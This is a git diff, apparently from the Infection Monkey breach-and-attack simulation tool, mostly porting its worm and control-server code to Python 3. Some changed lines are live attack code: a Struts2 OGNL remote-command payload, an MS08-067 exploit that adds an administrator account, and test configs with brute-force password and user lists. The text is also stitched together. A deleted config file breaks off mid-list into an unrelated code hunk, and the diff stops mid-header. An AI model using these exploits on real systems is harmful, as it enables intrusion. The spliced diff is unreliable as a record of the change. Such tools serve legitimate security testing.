diff --git a/envs/monkey_zoo/blackbox/island_configs/HADOOP.conf b/envs/monkey_zoo/blackbox/island_configs/HADOOP.conf index 1b55557a9..0b897080b 100644 --- a/envs/monkey_zoo/blackbox/island_configs/HADOOP.conf +++ b/envs/monkey_zoo/blackbox/island_configs/HADOOP.conf @@ -24,7 +24,7 @@ "local_network_scan": false, "subnet_scan_list": [ "10.2.2.3", - "10.2.2.10" + "10.2.2.2" ] }, "network_analysis": { diff --git a/envs/monkey_zoo/blackbox/island_configs/SHELLSHOCK.conf b/envs/monkey_zoo/blackbox/island_configs/SHELLSHOCK.conf index 7fd857e65..83414774b 100644 --- a/envs/monkey_zoo/blackbox/island_configs/SHELLSHOCK.conf +++ b/envs/monkey_zoo/blackbox/island_configs/SHELLSHOCK.conf @@ -23,7 +23,7 @@ "depth": 2, "local_network_scan": false, "subnet_scan_list": [ - "10.2.2.38" + "10.2.2.8" ] }, "network_analysis": { diff --git a/envs/monkey_zoo/blackbox/island_configs/SMB_MIMIKATZ.conf b/envs/monkey_zoo/blackbox/island_configs/SMB_MIMIKATZ.conf index b5001025f..e2a8a5596 100644 --- a/envs/monkey_zoo/blackbox/island_configs/SMB_MIMIKATZ.conf +++ b/envs/monkey_zoo/blackbox/island_configs/SMB_MIMIKATZ.conf @@ -21,7 +21,7 @@ "depth": 2, "local_network_scan": false, "subnet_scan_list": [ - "10.2.2.44", + "10.2.2.14", "10.2.2.15" ] }, diff --git a/envs/monkey_zoo/blackbox/island_configs/SSH.conf b/envs/monkey_zoo/blackbox/island_configs/SSH.conf index e96894111..ebb1def8b 100644 --- a/envs/monkey_zoo/blackbox/island_configs/SSH.conf +++ b/envs/monkey_zoo/blackbox/island_configs/SSH.conf @@ -22,8 +22,8 @@ "depth": 2, "local_network_scan": false, "subnet_scan_list": [ - "10.2.2.41", - "10.2.2.42" + "10.2.2.11", + "10.2.2.12" ] }, "network_analysis": { diff --git a/envs/monkey_zoo/blackbox/island_configs/STRUTS2.conf b/envs/monkey_zoo/blackbox/island_configs/STRUTS2.conf index 30bb135e4..ea53f3b0b 100644 --- a/envs/monkey_zoo/blackbox/island_configs/STRUTS2.conf +++ b/envs/monkey_zoo/blackbox/island_configs/STRUTS2.conf @@ -23,8 +23,8 @@ "depth": 2, "local_network_scan": false, "subnet_scan_list": [ - "10.2.2.9", - "10.2.2.11" + "10.2.2.23", + "10.2.2.24" ] }, "network_analysis": { diff --git a/envs/monkey_zoo/blackbox/island_configs/TUNNELING.conf b/envs/monkey_zoo/blackbox/island_configs/TUNNELING.conf index a7e84f1b8..306a683eb 100644 --- a/envs/monkey_zoo/blackbox/island_configs/TUNNELING.conf +++ b/envs/monkey_zoo/blackbox/island_configs/TUNNELING.conf @@ -5,10 +5,15 @@ "Password1!", "3Q=(Ge(+&w]*", "`))jU7L(w}", - "12345678" + "12345678", + "another_one", + "and_another_one", + "one_more" ], "exploit_user_list": [ "Administrator", + "rand", + "rand2", "m0nk3y", "user" ] @@ -23,7 +28,7 @@ "depth": 3, "local_network_scan": false, "subnet_scan_list": [ - "10.2.2.32", + "10.2.2.9", "10.2.1.10", "10.2.0.11" ] diff --git a/envs/monkey_zoo/blackbox/island_configs/WMI_MIMIKATZ.conf b/envs/monkey_zoo/blackbox/island_configs/WMI_MIMIKATZ.conf index 1498530d5..7b5fb3784 100644 --- a/envs/monkey_zoo/blackbox/island_configs/WMI_MIMIKATZ.conf +++ b/envs/monkey_zoo/blackbox/island_configs/WMI_MIMIKATZ.conf @@ -21,7 +21,7 @@ "depth": 2, "local_network_scan": false, "subnet_scan_list": [ - "10.2.2.44", + "10.2.2.14", "10.2.2.15" ] }, diff --git a/envs/monkey_zoo/blackbox/test_blackbox.py b/envs/monkey_zoo/blackbox/test_blackbox.py index 2f8be839d..fc20c8b39 100644 --- a/envs/monkey_zoo/blackbox/test_blackbox.py +++ b/envs/monkey_zoo/blackbox/test_blackbox.py @@ -13,9 +13,9 @@ from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHand DEFAULT_TIMEOUT_SECONDS = 5*60 MACHINE_BOOTUP_WAIT_SECONDS = 30 -GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'haddop-2-v3', 'hadoop-3', 'mssql-16', - 'mimikatz-14', 'mimikatz-15', 'final-test-struts2-23', 'final-test-struts2-24', - 'tunneling-9', 'tunneling-10', 'tunneling-11', 'weblogic-18', 'weblogic-19', 'shellshock-8'] +GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'haddop-2', 'hadoop-3', 'mssql-16', + 'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10', + 'tunneling-11', 'weblogic-18', 'weblogic-19', 'shellshock-8'] LOG_DIR_PATH = "./logs" LOGGER = logging.getLogger(__name__) diff --git a/envs/monkey_zoo/configs/fullTest.conf b/envs/monkey_zoo/configs/fullTest.conf deleted file mode 100644 index d90d84ca4..000000000 --- a/envs/monkey_zoo/configs/fullTest.conf +++ /dev/null @@ -1,202 +0,0 @@ -{ - "basic": { - "credentials": { - "exploit_password_list": [ - "`))jU7L(w}", - "3Q=(Ge(+&w]*", - "^NgDvY59~8", - "Ivrrw5zEzs", - "YbS," % (self._cidr_range,) @@ -151,10 +150,10 @@ class SingleIpRange(NetworkRange): return self._ip_address @staticmethod - def string_to_host(string): + def string_to_host(string_): """ Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip - :param string: String that was entered in "Scan IP/subnet list" + :param string_: String that was entered in "Scan IP/subnet list" :return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com) """ # The most common use case is to enter ip/range into "Scan IP/subnet list" @@ -162,16 +161,16 @@ class SingleIpRange(NetworkRange): # Try casting user's input as IP try: - ip = ipaddress.ip_address(string).exploded + ip = ipaddress.ip_address(string_).exploded except ValueError: # Exception means that it's a domain name try: - ip = socket.gethostbyname(string) - domain_name = string + ip = socket.gethostbyname(string_) + domain_name = string_ except socket.error: LOG.error("Your specified host: {} is not found as a domain name and" - " it's not an IP address".format(string)) - return None, string - # If a string was entered instead of IP we presume that it was domain name and translate it + " it's not an IP address".format(string_)) + return None, string_ + # If a string_ was entered instead of IP we presume that it was domain name and translate it return ip, domain_name diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 4e917e5a6..54d528976 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -9,7 +9,7 @@ from requests.exceptions import ConnectionError import infection_monkey.monkeyfs as monkeyfs import infection_monkey.tunnel as tunnel from infection_monkey.config import WormConfiguration, GUID -from infection_monkey.network.info import local_ips, check_internet_access, TIMEOUT +from infection_monkey.network.info import local_ips, check_internet_access from infection_monkey.transport.http import HTTPConnectProxy from infection_monkey.transport.tcp import TcpProxy @@ -85,7 +85,7 @@ class ControlClient(object): except ConnectionError as exc: current_server = "" - LOG.warn("Error connecting to control server %s: %s", server, exc) + LOG.warning("Error connecting to control server %s: %s", server, exc) if current_server: return True @@ -112,14 +112,14 @@ class ControlClient(object): monkey = {} if ControlClient.proxies: monkey['tunnel'] = ControlClient.proxies.get('https') - reply = requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), - data=json.dumps(monkey), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies) + requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), + data=json.dumps(monkey), + headers={'content-type': 'application/json'}, + verify=False, + proxies=ControlClient.proxies) except Exception as exc: - LOG.warn("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning("Error connecting to control server %s: %s", + WormConfiguration.current_server, exc) return {} @staticmethod @@ -129,14 +129,14 @@ class ControlClient(object): return try: telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data} - reply = requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), - data=json.dumps(telemetry), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies) + requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), + data=json.dumps(telemetry), + headers={'content-type': 'application/json'}, + verify=False, + proxies=ControlClient.proxies) except Exception as exc: - LOG.warn("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning("Error connecting to control server %s: %s", + WormConfiguration.current_server, exc) @staticmethod def send_log(log): @@ -144,14 +144,14 @@ class ControlClient(object): return try: telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)} - reply = requests.post("https://%s/api/log" % (WormConfiguration.current_server,), - data=json.dumps(telemetry), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies) + requests.post("https://%s/api/log" % (WormConfiguration.current_server,), + data=json.dumps(telemetry), + headers={'content-type': 'application/json'}, + verify=False, + proxies=ControlClient.proxies) except Exception as exc: - LOG.warn("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning("Error connecting to control server %s: %s", + WormConfiguration.current_server, exc) @staticmethod def load_control_config(): @@ -163,8 +163,8 @@ class ControlClient(object): proxies=ControlClient.proxies) except Exception as exc: - LOG.warn("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning("Error connecting to control server %s: %s", + WormConfiguration.current_server, exc) return try: @@ -191,7 +191,7 @@ class ControlClient(object): verify=False, proxies=ControlClient.proxies) except Exception as exc: - LOG.warn("Error connecting to control server %s: %s", WormConfiguration.current_server, exc) + LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc) return {} @staticmethod @@ -261,8 +261,8 @@ class ControlClient(object): return dest_file except Exception as exc: - LOG.warn("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning("Error connecting to control server %s: %s", + WormConfiguration.current_server, exc) @staticmethod def get_monkey_exe_filename_and_size_by_host(host): @@ -288,8 +288,8 @@ class ControlClient(object): return None, None except Exception as exc: - LOG.warn("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning("Error connecting to control server %s: %s", + WormConfiguration.current_server, exc) return None, None diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index 7c576fc30..ee1194035 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -26,7 +26,7 @@ else: try: WindowsError except NameError: - WindowsError = None + WindowsError = IOError __author__ = 'itamar' @@ -104,14 +104,14 @@ class MonkeyDrops(object): try: ref_stat = os.stat(dropper_date_reference_path) except OSError as exc: - LOG.warn("Cannot set reference date using '%s', file not found", - dropper_date_reference_path) + LOG.warning("Cannot set reference date using '%s', file not found", + dropper_date_reference_path) else: try: os.utime(self._config['destination_path'], (ref_stat.st_atime, ref_stat.st_mtime)) except: - LOG.warn("Cannot set reference date to destination file") + LOG.warning("Cannot set reference date to destination file") monkey_options =\ build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth) @@ -135,7 +135,7 @@ class MonkeyDrops(object): time.sleep(3) if monkey_process.poll() is not None: - LOG.warn("Seems like monkey died too soon") + LOG.warning("Seems like monkey died too soon") def cleanup(self): try: diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index 84d474db3..194e18625 100644 --- a/monkey/infection_monkey/example.conf +++ b/monkey/infection_monkey/example.conf @@ -44,7 +44,8 @@ "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", - "VSFTPDExploiter" + "VSFTPDExploiter", + "MSSQLExploiter" ], "finger_classes": [ "SSHFinger", @@ -93,7 +94,8 @@ 3306, 8008, 9200, - 7001 + 7001, + 8088 ], "timeout_between_iterations": 10, "use_file_logging": true, diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py index 312b747b0..9e899b140 100644 --- a/monkey/infection_monkey/exploit/__init__.py +++ b/monkey/infection_monkey/exploit/__init__.py @@ -12,7 +12,8 @@ class HostExploiter(object, metaclass=ABCMeta): # Usual values are 'vulnerability' or 'brute_force' EXPLOIT_TYPE = ExploitType.VULNERABILITY - @abstractproperty + @property + @abstractmethod def _EXPLOITED_SERVICE(self): pass @@ -73,7 +74,7 @@ class HostExploiter(object, metaclass=ABCMeta): """ powershell = True if "powershell" in cmd.lower() else False self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell}) - + from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter from infection_monkey.exploit.wmiexec import WmiExploiter diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index c860326bc..dcad2adf1 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -10,7 +10,6 @@ from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth from infection_monkey.model import DROPPER_ARG -from infection_monkey.utils.monkey_dir import get_monkey_dir_path from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index 762cc14b5..e48a21616 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py @@ -216,6 +216,9 @@ class SambaCryExploiter(HostExploiter): pattern = re.compile(r'\d*\.\d*\.\d*') smb_server_name = self.host.services[SMB_SERVICE].get('name') + if not smb_server_name: + LOG.info("Host: %s refused SMB connection" % self.host.ip_addr) + return False samba_version = "unknown" pattern_result = pattern.search(smb_server_name) is_vulnerable = False diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py index 61c0b0a1e..18331e994 100644 --- a/monkey/infection_monkey/exploit/smbexec.py +++ b/monkey/infection_monkey/exploit/smbexec.py @@ -125,8 +125,8 @@ class SmbExploiter(HostExploiter): try: scmr_rpc.connect() except Exception as exc: - LOG.warn("Error connecting to SCM on exploited machine %r: %s", - self.host, exc) + LOG.warning("Error connecting to SCM on exploited machine %r: %s", + self.host, exc) return False smb_conn = rpctransport.get_smb_connection() diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index f7abd3ce0..ce2e0d13c 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -125,7 +125,7 @@ class SSHExploiter(HostExploiter): if not self.host.os.get('type'): try: _, stdout, _ = ssh.exec_command('uname -o') - uname_os = stdout.read().lower().strip() + uname_os = stdout.read().lower().strip().decode() if 'linux' in uname_os: self.host.os['type'] = 'linux' else: diff --git a/monkey/infection_monkey/exploit/struts2.py b/monkey/infection_monkey/exploit/struts2.py index 4be2d0acd..fc2fd764d 100644 --- a/monkey/infection_monkey/exploit/struts2.py +++ b/monkey/infection_monkey/exploit/struts2.py @@ -79,9 +79,6 @@ class Struts2Exploiter(WebRCE): "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \ "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \ "(#ros.flush())}" % cmd - # Turns payload ascii just for consistency - if isinstance(payload, str): - payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore') headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} try: request = urllib.request.Request(url, headers=headers) @@ -91,6 +88,6 @@ class Struts2Exploiter(WebRCE): # If url does not exist return False except http.client.IncompleteRead as e: - page = e.partial + page = e.partial.decode() return page diff --git a/monkey/infection_monkey/exploit/tools/wmi_tools.py b/monkey/infection_monkey/exploit/tools/wmi_tools.py index f9f7b9ae3..e1e002d72 100644 --- a/monkey/infection_monkey/exploit/tools/wmi_tools.py +++ b/monkey/infection_monkey/exploit/tools/wmi_tools.py @@ -48,7 +48,7 @@ class WmiTools(object): except Exception as exc: dcom.disconnect() - if "rpc_s_access_denied" == exc.message: + if "rpc_s_access_denied" == exc: raise AccessDeniedException(host, username, password, domain) raise diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py index 047574d7e..7148ba965 100644 --- a/monkey/infection_monkey/exploit/win_ms08_067.py +++ b/monkey/infection_monkey/exploit/win_ms08_067.py @@ -191,11 +191,11 @@ class Ms08_067_Exploiter(HostExploiter): try: sock = exploit.start() - sock.send("cmd /c (net user %s %s /add) &&" - " (net localgroup administrators %s /add)\r\n" % - (self._config.user_to_add, - self._config.remote_user_pass, - self._config.user_to_add)) + sock.send("cmd /c (net user {} {} /add) &&" + " (net localgroup administrators {} /add)\r\n".format( + self._config.user_to_add, + self._config.remote_user_pass, + self._config.user_to_add).encode()) time.sleep(2) reply = sock.recv(1000) diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index db9ef76d4..3985c8a2e 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -6,7 +6,6 @@ import sys import time import infection_monkey.tunnel as tunnel -from infection_monkey.utils.environment import is_windows_os from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir from infection_monkey.utils.monkey_log_path import get_monkey_log_path from infection_monkey.utils.environment import is_windows_os diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index d29adddb1..0ada7f403 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -38,6 +38,7 @@ def main(): debug=False, strip=get_exe_strip(), upx=True, + upx_exclude=['vcruntime140.dll'], console=True, icon=get_exe_icon()) diff --git a/monkey/infection_monkey/network/__init__.py b/monkey/infection_monkey/network/__init__.py index 33a6871e2..fe3e6cb7a 100644 --- a/monkey/infection_monkey/network/__init__.py +++ b/monkey/infection_monkey/network/__init__.py @@ -1,4 +1,4 @@ -from abc import ABCMeta, abstractmethod, abstractproperty +from abc import ABCMeta, abstractmethod __author__ = 'itamar' @@ -10,7 +10,8 @@ class HostScanner(object, metaclass=ABCMeta): class HostFinger(object, metaclass=ABCMeta): - @abstractproperty + @property + @abstractmethod def _SCANNED_SERVICE(self): pass diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index 88171ecda..16af673b1 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -92,7 +92,7 @@ class WinAdvFirewall(FirewallApp): def close(self): try: for rule in list(self._rules.keys()): - self.remove_firewall_rule({'name': rule}) + self.remove_firewall_rule(name=rule) except: pass diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 50cd7aa0a..cc198312c 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -1,4 +1,3 @@ -import sys import socket import struct import psutil @@ -63,7 +62,7 @@ else: def get_routes(): # based on scapy implementation for route parsing - LOOPBACK_NAME = "lo" + LOOPBACK_NAME = b"lo" SIOCGIFADDR = 0x8915 # get PA address SIOCGIFNETMASK = 0x891b # get network PA mask RTF_UP = 0x0001 # Route usable @@ -85,7 +84,7 @@ else: routes.append((dst, msk, "0.0.0.0", LOOPBACK_NAME, ifaddr)) for l in f.readlines()[1:]: - iff, dst, gw, flags, x, x, x, msk, x, x, x = l.split() + iff, dst, gw, flags, x, x, x, msk, x, x, x = [var.encode() for var in l.split()] flags = int(flags, 16) if flags & RTF_UP == 0: continue diff --git a/monkey/infection_monkey/network/mssql_fingerprint.py b/monkey/infection_monkey/network/mssql_fingerprint.py index 7b666bf9f..e6130732d 100644 --- a/monkey/infection_monkey/network/mssql_fingerprint.py +++ b/monkey/infection_monkey/network/mssql_fingerprint.py @@ -1,3 +1,4 @@ +import errno import logging import socket @@ -54,7 +55,7 @@ class MSSQLFinger(HostFinger): sock.close() return False except socket.error as e: - if e.errno == socket.errno.ECONNRESET: + if e.errno == errno.ECONNRESET: LOG.info('Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.' .format(host)) else: diff --git a/monkey/infection_monkey/network/smbfinger.py b/monkey/infection_monkey/network/smbfinger.py index b39ffef7a..1e765114c 100644 --- a/monkey/infection_monkey/network/smbfinger.py +++ b/monkey/infection_monkey/network/smbfinger.py @@ -120,27 +120,26 @@ class SMBFinger(HostFinger): n = SMBNego(data=SMBNegoFingerData()) n.calculate() - Packet = str(h) + str(n) - Buffer = struct.pack(">i", len(''.join(Packet))) + Packet - s.send(Buffer) + packet_ = str(h) + str(n) + buffer = struct.pack(">i", len(packet_)) + packet_.encode() + s.send(buffer) data = s.recv(2048) if data[8:10] == "\x72\x00": - Header = SMBHeader(cmd="\x73", flag1="\x18", flag2="\x17\xc8", uid="\x00\x00") - Body = SMBSessionFingerData() - Body.calculate() + header = SMBHeader(cmd="\x73", flag1="\x18", flag2="\x17\xc8", uid="\x00\x00") + body = SMBSessionFingerData() + body.calculate() - Packet = str(Header) + str(Body) - Buffer = struct.pack(">i", len(''.join(Packet))) + Packet + packet_ = str(header) + str(body) + buffer = struct.pack(">i", len(packet_)) + packet_.encode() - s.send(Buffer) + s.send(buffer) data = s.recv(2048) if data[8:10] == "\x73\x16": length = struct.unpack(' 0: - banner = sock.recv(BANNER_READ) + banner = sock.recv(BANNER_READ).decode() except socket.error: pass @@ -96,7 +94,7 @@ def check_udp_port(ip, port, timeout=DEFAULT_TIMEOUT): is_open = False try: - sock.sendto("-", (ip, port)) + sock.sendto(b"-", (ip, port)) data, _ = sock.recvfrom(BANNER_READ) is_open = True except socket.error: @@ -116,7 +114,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False): :return: list of open ports. If get_banner=True, then a matching list of banners. """ sockets = [socket.socket(socket.AF_INET, socket.SOCK_STREAM) for _ in range(len(ports))] - [s.setblocking(0) for s in sockets] + [s.setblocking(False) for s in sockets] possible_ports = [] connected_ports_sockets = [] try: diff --git a/monkey/infection_monkey/post_breach/actions/communicate_as_new_user.py b/monkey/infection_monkey/post_breach/actions/communicate_as_new_user.py index 04dff1441..2a1a79b91 100644 --- a/monkey/infection_monkey/post_breach/actions/communicate_as_new_user.py +++ b/monkey/infection_monkey/post_breach/actions/communicate_as_new_user.py @@ -1,5 +1,4 @@ import logging -import os import random import string import subprocess @@ -39,7 +38,7 @@ class CommunicateAsNewUser(PBA): exit_status = new_user.run_as(ping_commandline) self.send_ping_result_telemetry(exit_status, ping_commandline, username) except subprocess.CalledProcessError as e: - PostBreachTelem(self, (e.output, False)).send() + PostBreachTelem(self, (e.output.decode(), False)).send() except NewUserError as e: PostBreachTelem(self, (str(e), False)).send() diff --git a/monkey/infection_monkey/post_breach/pba.py b/monkey/infection_monkey/post_breach/pba.py index 8d7723df2..73b8a3221 100644 --- a/monkey/infection_monkey/post_breach/pba.py +++ b/monkey/infection_monkey/post_breach/pba.py @@ -14,6 +14,7 @@ __author__ = 'VakarisZ' EXECUTION_WITHOUT_OUTPUT = "(PBA execution produced no output)" + class PBA(object): """ Post breach action object. Can be extended to support more than command execution on target machine. @@ -75,13 +76,13 @@ class PBA(object): :return: Tuple of command's output string and boolean, indicating if it succeeded """ try: - output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True) + output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True).decode() if not output: output = EXECUTION_WITHOUT_OUTPUT return output, True except subprocess.CalledProcessError as e: # Return error output of the command - return e.output, False + return e.output.decode(), False @staticmethod def choose_command(linux_cmd, windows_cmd): diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt index f30131267..e9872b396 100644 --- a/monkey/infection_monkey/requirements_linux.txt +++ b/monkey/infection_monkey/requirements_linux.txt @@ -7,7 +7,6 @@ odict paramiko psutil==3.4.2 PyInstaller -six ecdsa netifaces ipaddress diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt index ce5021923..61fff177d 100644 --- a/monkey/infection_monkey/requirements_windows.txt +++ b/monkey/infection_monkey/requirements_windows.txt @@ -7,7 +7,6 @@ odict paramiko psutil PyInstaller -six ecdsa netifaces ipaddress diff --git a/monkey/infection_monkey/system_info/__init__.py b/monkey/infection_monkey/system_info/__init__.py index 53324afb7..ab8e0f7ba 100644 --- a/monkey/infection_monkey/system_info/__init__.py +++ b/monkey/infection_monkey/system_info/__init__.py @@ -16,7 +16,7 @@ LOG = logging.getLogger(__name__) try: WindowsError except NameError: - WindowsError = None + WindowsError = psutil.AccessDenied __author__ = 'uri' diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 9d6f6a1f2..08ca6ff29 100644 --- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -1,6 +1,7 @@ import os import logging import sys +sys.coinit_flags = 0 # needed for proper destruction of the wmi python module import infection_monkey.config from infection_monkey.system_info.mimikatz_collector import MimikatzCollector @@ -8,9 +9,6 @@ from infection_monkey.system_info import InfoCollector from infection_monkey.system_info.wmi_consts import WMI_CLASSES from common.utils.wmi_utils import WMIUtils - -sys.coinit_flags = 0 # needed for proper destruction of the wmi python module - LOG = logging.getLogger(__name__) LOG.info('started windows info collector') diff --git a/monkey/infection_monkey/telemetry/base_telem.py b/monkey/infection_monkey/telemetry/base_telem.py index 17cf6cb63..2d59b9cbf 100644 --- a/monkey/infection_monkey/telemetry/base_telem.py +++ b/monkey/infection_monkey/telemetry/base_telem.py @@ -25,7 +25,8 @@ class BaseTelem(object, metaclass=abc.ABCMeta): logger.debug("Sending {} telemetry. Data: {}".format(self.telem_category, json.dumps(data))) ControlClient.send_telemetry(self.telem_category, data) - @abc.abstractproperty + @property + @abc.abstractmethod def telem_category(self): """ :return: Telemetry type diff --git a/monkey/infection_monkey/tunnel.py b/monkey/infection_monkey/tunnel.py index 722dea50e..f2124f9fc 100644 --- a/monkey/infection_monkey/tunnel.py +++ b/monkey/infection_monkey/tunnel.py @@ -48,7 +48,7 @@ def _check_tunnel(address, port, existing_sock=None): return False try: - sock.sendto("+", (address, MCAST_PORT)) + sock.sendto(b"+", (address, MCAST_PORT)) except Exception as exc: LOG.debug("Caught exception in tunnel registration: %s", exc) @@ -71,13 +71,13 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT): try: LOG.info("Trying to find using adapter %s", adapter) sock = _set_multicast_socket(timeout, adapter) - sock.sendto("?", (MCAST_GROUP, MCAST_PORT)) + sock.sendto(b"?", (MCAST_GROUP, MCAST_PORT)) tunnels = [] while True: try: answer, address = sock.recvfrom(BUFFER_READ) - if answer not in ['?', '+', '-']: + if answer not in [b'?', b'+', b'-']: tunnels.append(answer) except socket.timeout: break @@ -102,7 +102,7 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT): def quit_tunnel(address, timeout=DEFAULT_TIMEOUT): try: sock = _set_multicast_socket(timeout) - sock.sendto("-", (address, MCAST_PORT)) + sock.sendto(b"-", (address, MCAST_PORT)) sock.close() LOG.debug("Success quitting tunnel") except Exception as exc: @@ -147,17 +147,17 @@ class MonkeyTunnel(Thread): while not self._stopped: try: search, address = self._broad_sock.recvfrom(BUFFER_READ) - if '?' == search: + if b'?' == search: ip_match = get_interface_to_target(address[0]) if ip_match: answer = '%s:%d' % (ip_match, self.local_port) LOG.debug("Got tunnel request from %s, answering with %s", address[0], answer) - self._broad_sock.sendto(answer, (address[0], MCAST_PORT)) - elif '+' == search: + self._broad_sock.sendto(answer.encode(), (address[0], MCAST_PORT)) + elif b'+' == search: if not address[0] in self._clients: LOG.debug("Tunnel control: Added %s to watchlist", address[0]) self._clients.append(address[0]) - elif '-' == search: + elif b'-' == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] @@ -170,7 +170,7 @@ class MonkeyTunnel(Thread): while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT): try: search, address = self._broad_sock.recvfrom(BUFFER_READ) - if '-' == search: + if b'-' == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] except socket.timeout: diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index 55a5f9190..324903809 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -47,6 +47,11 @@ class Monkey(Document): @staticmethod def __ring_key__(): + """ + Cache key representation + https://ring-cache.readthedocs.io/en/stable/quickstart.html#method-classmethod-staticmethod-property + :return: + """ return Monkey.guid # LOGIC diff --git a/monkey/monkey_island/cc/resources/remote_run.py b/monkey/monkey_island/cc/resources/remote_run.py index 675c292c1..c41699add 100644 --- a/monkey/monkey_island/cc/resources/remote_run.py +++ b/monkey/monkey_island/cc/resources/remote_run.py @@ -34,10 +34,10 @@ class RemoteRun(flask_restful.Resource): try: resp['instances'] = AwsService.get_instances() except NoCredentialsError as e: - resp['error'] = NO_CREDS_ERROR_FORMAT.format(e.message) + resp['error'] = NO_CREDS_ERROR_FORMAT.format(e) return jsonify(resp) except ClientError as e: - resp['error'] = CLIENT_ERROR_FORMAT.format(e.message) + resp['error'] = CLIENT_ERROR_FORMAT.format(e) return jsonify(resp) return jsonify(resp) diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index 68a84729a..a655c5f9f 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ 